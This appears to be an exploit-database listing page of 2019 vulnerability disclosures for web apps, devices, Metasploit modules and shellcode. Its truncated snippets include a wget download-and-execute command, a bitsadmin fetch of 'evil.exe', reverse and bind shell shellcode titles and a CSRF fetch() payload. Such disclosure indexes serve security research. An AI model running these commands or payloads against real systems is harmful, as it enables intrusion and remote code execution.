WordPress Like Button 1.6.0 Plugin - Authentication Bypass Vulnerability
Exploit for php platform in category web applications Exploit Title: WP Like Button 1.6.0 - Auth Bypass Exploit Author: Benjamin Lim Vendor Homepage: http://www.crudlab.com Software Link: https://wordpress.org/plugins/wp-like-button/ Version: 1.6.0 CVE : CVE-2019-13344 1. Product & Service...
Cisco Data Center Network Manager 11.1(1) Remote Code Execution Exploit
Cisco Data Center Network Manager DCNM versions 11.11 and below suffer from authentication bypass, arbitrary file upload, arbitrary file download, and information disclosure vulnerabilities. Authentication Bypass and Arbitrary File Upload leading to remote code execution on Cisco Data Center...
Sony BRAVIA Smart TV Denial Of Service Vulnerability
Sony BRAVIA Smart TV Denial Of Service ADVISORY INFORMATION TITLE: Two vulnerabilities found in Sony BRAVIA Smart TVs ADVISORY URL: CVE-2019-11889 https://www.darkmatter.ae/xen1thlabs/sony-remote-denial-of-service-triggered-over-vulnerability-hbbtv-xl-19-014/ CVE-2019-11890...
Karenderia CMS 5.3 SQL Injection Vulnerability
Exploit for php platform in category web applications Exploit Title: Karenderia CMS 5.3 - Multiple SQL Vuln. Exploit Author: Mehmet EMIROGLU Vendor Homepage: email protected Software Link:...
Huawei HG530 Cross Site Request Forgery Vulnerability
Exploit for hardware platform in category web applications Multiple CSRF reboot and restore Vulnerability. The Huawei HG530 suffers from multiple CSRF vulnerabilities that allow local attackers to reboot the device or to restore it to factory configuration. Th...
Karenderia Multiple Restaurant System 5.3 - Local File Inclusion Vulnerability
Exploit for php platform in category web applications Exploit Title: Karenderia CMS 5.1 - LFI Vuln. Dork: N/A Date: 04-07-2019 Exploit Author: Mehmet EMIROGLU Software Link:...
Microsoft Exchange 2003 - base64-MIME Remote Code Execution Exploit
Python 2.7 included with ImmunityDBG Exchange 2003 SP0 base64-MIME memory corruption NSA's ENGLISHMANSDENTIST Platform: Windows Server 2003 R2 Shout out to the Equation Group, NSA Tailored Access Operations Author: Charles Truscott @r0ss1n1 Shout out to Offensive Security, from Australia with Lov...
BKS EBK Ethernet-Buskoppler Pro Shell Upload Vulnerability
BKS EBK Ethernet-Buskoppler Pro versions prior to 3.01 suffer from a remote shell upload vulnerability. Product: BKS EBK Ethernet-Buskoppler Pro Manufacturer: BKS GmbH Affected Versions: 3.01 Vulnerability Type: Unrestricted Upload of File with Dangerous Type CWE-434 Risk Level: High Solution...
Google ChromeOS SafeSetID LSM Transitive Trust Exploit
ChromeOS: multiple issues in SafeSetID LSM I decided to take a look at the new SafeSetID LSM that ChromeOS upstreamed and found several issues. Since this LSM is already running on Pixelbook on the stable channel, I'm filing this as a security bug. This LSM restricts the use of CAPSETUID by...
Hawtio 2.5.0 Server Side Request Forgery Vulnerability
Exploit for java platform in category web applications Hawtio Server-Side Request Forgery Introduction ============ Hawtio https://hawt.io/ is a modular web console for managing Java. CipherTechs discovered that Hawtio up to and including version 2.5.0 is vulnerable to unauthenticated Server-Side...
Symantec DLP 15.5 MP1 - Cross-Site Scripting Vulnerability
Exploit for multiple platform in category web applications Exploit Title: Persistent XSS on Symantec DLP = 15.5 MP1 Exploit Author: Chapman Schleiss Vendor Homepage: https://www.symantec.com/ Software Link: https://support.symantec.com/us/en/mysymantec.html Version: = 15.5 MP1 CVE : 2019-9701...
PowerPanel Business Edition - Cross-Site Scripting Vulnerability
Exploit for linux platform in category web applications Exploit Title: PowerPanel Business Edition - Stored Cross Site Scripting SNMP trap receivers Google Dork: None Exploit Author: Joey Lane Vendor Homepage: https://www.cyberpowersystems.com Software Link:...
ZoneMinder 1.32.3 - Cross-Site Scripting Vulnerability
Exploit for php platform in category web applications Exploit Title: ZoneMinder 1.32.3 - Stored Cross Site Scripting filters Google Dork: None Exploit Author: Joey Lane Vendor Homepage: https://zoneminder.com Software Link: https://github.com/ZoneMinder/zoneminder/releases Version: 1.32.3 Tested...
CiuisCRM 1.6 - eventType SQL Injection Vulnerability
Exploit for php platform in category web applications Exploit Title: CiuisCRM 1.6 - 'eventType' SQL Inj. Exploit Author: Mehmet EMİROĞLU Vendor Homepage: https://codecanyon.net/item/ciuis-crm/20473489...
FaceSentry Access Control System 6.4.8 - Remote Root Exploit
Exploit for hardware platform in category web applications !/usr/bin/env python -- coding: utf-8 -- FaceSentry Access Control System 6.4.8 Remote Root Exploit Vendor: iWT Ltd. Product web page: http://www.iwt.com.hk Affected version: Firmware 6.4.8 build 264 Algorithm A16 Firmware 5.7.2 build 568...
FaceSentry Access Control System 6.4.8 - Remote SSH Root Exploit
Exploit for hardware platform in category web applications !/usr/bin/env python -- coding: utf-8 -- FaceSentry Access Control System 6.4.8 Remote SSH Root Access Exploit Vendor: iWT Ltd. Product web page: http://www.iwt.com.hk Affected version: Firmware 6.4.8 build 264 Algorithm A16 Firmware 5.7....
MacOS X #TimeMachine - (tmdiagnose) Command Injection Privilege Escalation Exploit #RCE
Exploit for macOS platform in category local exploits This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule 'Mac OS X TimeMachine tmdiagnose Command Injection Privilege Escalation', 'Description' = %q...
Varient 1.6.1 - SQL Injection Vulnerability
Exploit for multiple platform in category web applications Exploit Title: Varient 1.6.1 SQL Inj. Exploit Author: Mehmet EMIROGLU Vendor Homepage: https://varient.codingest.com/ Software Link:...
FaceSentry Access Control System 6.4.8 - Remote Command Injection Vulnerability
Exploit for hardware platform in category web applications FaceSentry Access Control System 6.4.8 Remote Command Injection Vendor: iWT Ltd. Product web page: http://www.iwt.com.hk Affected version: Firmware 6.4.8 build 264 Algorithm A16 Firmware 5.7.2 build 568 Algorithm A14 Firmware 5.7.0 build...
CyberPanel 1.8.4 - Cross-Site Request Forgery Vulnerability
Exploit for multiple platform in category web applications Title: CyberPanel Administrator Account Takeover fetch'https://SERVERIP:8090/users/saveModifications', method: 'POST', credentials: 'include', headers: 'Content-Type': 'text/plain', body:...
SAP Crystal Reports - Information Disclosure Vulnerability
Exploit for multiple platform in category web applications Exploit Title: Sensitive Information Disclosure in SAP Crystal Reports Exploit Author: Mohamed M.Fouad - From SecureMisr Company Vendor Homepage: https://wiki.scn.sap.com/wiki/pages/viewpage.action?pageId=517899114 Version: SAP Crystal...
Linux/ARM64 - mmap() + read() stager + execve("/bin/sh", NULL, NULL) Shellcode (60 Bytes
/ Title: Linux/ARM64 - mmap + read stager + execve"/bin/sh", NULL, NULL Shellcode 60 Bytes Date: 2019-06-30 Tested: Ubuntu 16.04 aarch64 Author: Ken Kitahara Compilation: gcc -o loader loader.c ubuntu@ubuntu:/works$ lsbrelease -a No LSB modules are available. Distributor ID: Ubuntu Description:...
FaceSentry Access Control System 6.4.8 - Cross-Site Request Forgery Vulnerability
Exploit for hardware platform in category web applications FaceSentry Access Control System 6.4.8 Cross-Site Request Forgery Vendor: iWT Ltd. Product web page: http://www.iwt.com.hk Affected version: Firmware 6.4.8 build 264 Algorithm A16 Firmware 5.7.2 build 568 Algorithm A14 Firmware 5.7.0 buil...
Linux/ARM64 - Reverse (::1:4444/TCP) Shell (/bin/sh) +IPv6 Shellcode (140 bytes)
/ Title: Linux/ARM64 - Reverse ::1:4444/TCP Shell /bin/sh +IPv6 Shellcode 140 bytes Date: 2019-06-30 Tested: Ubuntu 16.04 aarch64 Author: Ken Kitahara Compilation: gcc -o loader loader.c ubuntu@ubuntu:/works$ lsbrelease -a No LSB modules are available. Distributor ID: Ubuntu Description: Ubuntu...
Linux/ARM64 - Bind (4444/TCP) Shell (/bin/sh) + Null-Free Shellcode (164 bytes)
/ Title: Linux/ARM64 - Bind 4444/TCP Shell /bin/sh + Null-Free Shellcode 164 bytes Date: 2019-06-30 Tested: Ubuntu 16.04 aarch64 Author: Ken Kitahara Compilation: gcc -o loader loader.c ubuntu@ubuntu:/works$ lsbrelease -a No LSB modules are available. Distributor ID: Ubuntu Description: Ubuntu...
Linux/ARM64 - Read /etc/passwd Shellcode (120 Bytes)
/ Title: Linux/ARM64 - Read /etc/passwd Shellcode 120 Bytes Date: 2019-06-30 Tested: Ubuntu 16.04 aarch64 Author: Ken Kitahara Compilation: gcc -o loader loader.c ubuntu@ubuntu:/works$ lsbrelease -a No LSB modules are available. Distributor ID: Ubuntu Description: Ubuntu Xenial Xerus development...
Linux/ARM64 - execve("/bin/sh", NULL, NULL) Shellcode (40 Bytes)
/ Title: Linux/ARM64 - execve"/bin/sh", NULL, NULL Shellcode 40 Bytes Date: 2019-06-30 Tested: Ubuntu 16.04 aarch64 Author: Ken Kitahara Compilation: gcc -o loader loader.c ubuntu@ubuntu:/works$ lsbrelease -a No LSB modules are available. Distributor ID: Ubuntu Description: Ubuntu Xenial Xerus...
Linux/ARM64 - Egghunter (PWN!PWN!) + execve("/bin/sh", NULL, NULL) + mprotect() Shellcod
/ Title: Linux/ARM64 - Egghunter PWN!PWN! + execve"/bin/sh", NULL, NULL + mprotect Shellcode 88 Bytes Date: 2019-06-30 Tested: Ubuntu 16.04 aarch64 Author: Ken Kitahara Compilation: gcc -o loader loader.c ubuntu@ubuntu:/works$ lsbrelease -a No LSB modules are available. Distributor ID: Ubuntu...
Linux Mint 18.3-19.1 - yelp Command Injection Exploit
This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework Exploit from github repro: https://github.com/b1ack0wl/linuxmintpoc class MetasploitModule "Linux Mint 'yelp' URI handler command injection vulnerability", 'Description'...
Apache Tomcat CGIServlet enableCmdLineArguments Remote Code Execution Exploit
This Metasploit module exploits a vulnerability in Apache Tomcat's CGIServlet component. When the enableCmdLineArguments setting is set to true, a remote user can abuse this to execute system commands, and gain remote code execution. This module requires Metasploit: https://metasploit.com/downloa...
Serv-U FTP Server 15.1.7 prepareinstallation Privilege Escalation Exploit
This Metasploit module attempts to gain root privileges on systems running Serv-U FTP Server versions prior to 15.1.7. The Serv-U executable is setuid root, and uses ARGV0 in a call to system, without validation, when invoked with the -prepareinstallation flag, resulting in command execution with...
Sahi pro 8.x - Directory Traversal Exploit
Exploit for multiple platform in category web applications Exploit Title: Sahi pro 8.x Directory traversal Exploit Author: Alexander Bluestein Vendor Homepage: https://sahipro.com/ Software Link: https://sahipro.com/downloads-archive/ Version: 8.0 Tested on: Linux Ubuntu / Windows 7 CVE:...
Linux/ARM64 - Bind (4444/TCP) Shell (/bin/sh) + IPv6 Shellcode (176 bytes)
/ Title: Linux/ARM64 - Bind 4444/TCP Shell /bin/sh + IPv6 Shellcode 176 bytes Date: 2019-06-30 Tested: Ubuntu 16.04 aarch64 Author: Ken Kitahara Compilation: gcc -o loader loader.c ubuntu@ubuntu:/works$ lsbrelease -a No LSB modules are available. Distributor ID: Ubuntu Description: Ubuntu Xenial...
Linux/ARM64 - Reverse (127.0.0.1:4444/TCP) Shell (/bin/sh) + Null-Free Shellcode (128 bytes)
/ Title: Linux/ARM64 - Reverse 127.0.0.1:4444/TCP Shell /bin/sh + Null-Free Shellcode 128 bytes Date: 2019-06-30 Tested: Ubuntu 16.04 aarch64 Author: Ken Kitahara Compilation: gcc -o loader loader.c ubuntu@ubuntu:/works$ lsbrelease -a No LSB modules are available. Distributor ID: Ubuntu...
Centreon 19.04 - Remote Code Execution Exploit #RCE
Exploit for php platform in category web applications !/usr/bin/python ''' Exploit Title: Centreon v19.04 authenticated Remote Code Execution Date: 28/06/2019 Exploit Author: Askar @mohammadaskar2 CVE : CVE-2019-13024 Vendor Homepage: https://www.centreon.com/ Software link:...
Linux/x86 - execve(/bin/sh) using JMP-CALL-POP Shellcode (21 bytes)
/ ;Category: Shellcode ;Title: GNU/Linux x86 - execve /bin/sh using JMP-CALL-POP technique 21 bytes ;Author: kiriknik ;Date: 01/07/2019 ;Architecture: Linux x86 =========== Asm Source =========== global start section .text start: jmp short callshellcode shellcode: pop ebx xor eax,eax mov al, 11 i...
Linux/ARM64 - execve(/bin/sh, [/bin/sh], NULL) Shellcode (48 Bytes)
/ Title: Linux/ARM64 - execve"/bin/sh", "/bin/sh", NULL Shellcode 48 Bytes Date: 2019-06-30 Tested: Ubuntu 16.04 aarch64 Author: Ken Kitahara Compilation: gcc -o loader loader.c ubuntu@ubuntu:/works$ lsbrelease -a No LSB modules are available. Distributor ID: Ubuntu Description: Ubuntu Xenial Xer...
WorkSuite PRM 2.4 - password SQL Injection Vulnerability
Exploit for php platform in category web applications Exploit Title: WorkSuite PRM 2.4 - 'password' SQL Inj. Exploit Author: Mehmet EMİROĞLU Vendor Homepage:...
Linux/ARM64 - Jump Back Shellcode + execve(/bin/sh, NULL, NULL) Shellcode (8 Bytes)
/ Title: Linux/ARM64 - Jump Back Shellcode + execve"/bin/sh", NULL, NULL Shellcode 8 Bytes Date: 2019-06-30 Tested: Ubuntu 16.04 aarch64 Author: Ken Kitahara Compilation: gcc -o loader loader.c ubuntu@ubuntu:/works$ lsbrelease -a No LSB modules are available. Distributor ID: Ubuntu Description:...
LibreNMS 1.46 - addhost Remote Code Execution Exploit
Exploit for php platform in category web applications !/usr/bin/python ''' Exploit Title: LibreNMS v1.46 authenticated Remote Code Execution Date: 24/12/2018 Exploit Author: Askar @mohammadaskar2 CVE : CVE-2018-20434 Vendor Homepage: https://www.librenms.org/ Version: v1.46 Tested on: Ubuntu 18.0...
Linux/x86 - Chmod + Execute (/usr/bin/wget 192.168.1.93//x) Hide Output Shellcode (129 bytes)
Linux/x86 - Chmod + Execute /usr/bin/wget http://192.168.1.93//x + Hide Output Shellcode 129 bytes / ; Shellcode 129 Bytes ; download via wget + chmod + execute shellcode + hide output ; Exec: /usr/bin/wget http://192.168.1.93//x /dev/null 2&1 ; global start section .text start: ;fork xor eax,eax...
Windows/x86 - Start iexplore.exe (http://192.168.10.10/) Shellcode (191 Bytes)
191 bytes small Windows/x86 start iexplore.exe shellcode. / Title: start iexplore.exe Author: Joseph McDonagh Shellcode length 191 Could be smaller if the app you are exploiting loads msvcrt. Purpose: Use the start command to open internet explorer and connect to a malicious web server The comma...
Windows Escalate UAC Protection Bypass Via SilentCleanup Exploit
There's a task in Windows Task Scheduler called "SilentCleanup" which, while it's executed as Users, automatically runs with elevated privileges. When it runs, it executes the file %windir%\system32\cleanmgr.exe. Since it runs as Users, and we can control user's environment variables, %windir%...
Linux/x86 - ASCII AND, SUB, PUSH, POPAD Encoder Shellcode
!/usr/bin/env python3 INTRODUCTION Encoder Title: ASCII shellcode encoder via AND, SUB, PUSH, POPAD Date: 26.6.2019 Encoder Author: Petr Javorik, www.mmquant.net Tested on: Linux ubuntu 3.13.0-32-generic, x86 Special thx to: Corelanc0d3r for intro to this technique Description: This encoder is...
AMD Secure Encrypted Virtualization (SEV) Key Recovery Vulnerability
AMD Secure Encrypted Virtualization SEV is a hardware memory encryption feature. SEV protects guest virtual machines from the hypervisor, provides confidentiality guarantees at runtime and remote attestation at launch time. The SEV elliptic-curve ECC implementation was found to be vulnerable to a...
D-Link Administrative Password Disclosure Vulnerability
D-Link models DIR-652, DIR-615, DIR-827, DIR-615, DIR-657, and DIR-825 suffer from an administrative password disclosure vulnerability. DLink Administrative Password Disclosure Vulnerability The problem in the following models : DIR-652 DIR-615 DIR-827 DIR-615 DIR-657 DIR-825 If login to web...
Windows/x86 - bitsadmin Download and Execute Shellcode (210 Bytes)
/ ; Windows/x86 - bitsadmin Download and Execute http://192.168.10.10/evil.exe c:\evil.exe Shellcode 210 Bytes ; Shellcode Title : bitsadmin download and execute ; Shellcode Author : Joseph McDonagh ; Date June 26, 2019 ; Shellcode Length 210 ; However, if the application you are exploiting alrea...
AZADMIN CMS 1.0 - SQL Injection Vulnerability
Exploit for php platform in category web applications + Sql Injection on AZADMIN CMS of HIDEA v1.0 + Date: 24/06/2019 + CWE Number : CWE-89 + Risk: High + Author: Felipe Andrian Peixoto + Vendor Homepage: https://www.hidea.com/ + Contact: email protected + Tested on: Windows 7 and Linux +...
dotProject 2.1.9 - SQL Injection Vulnerability
Exploit for php platform in category web applications Exploit Title: dotProject 2.1.9 - Multiple Sql Injection Poc Exploit Author: Metin Yunus Kandemir kandemir Vendor Homepage: https://dotproject.net Software Link: https://github.com/dotproject/dotProject/archive/v2.1.9.zip Version: 2.1.9...
SeedDMS < 5.1.11 - (out.UsrMgr.php) Cross-Site Scripting Vulnerability
Exploit for php platform in category web applications Exploit Title: Persistent Cross-Site Scripting or Stored XSS in out/out.UsrMgr.php in SeedDMS before 5.1.11 Exploit Author: Nimit Jain https://secfolks.blogspot.com Vendor Homepage: https://www.seeddms.org Software Link:...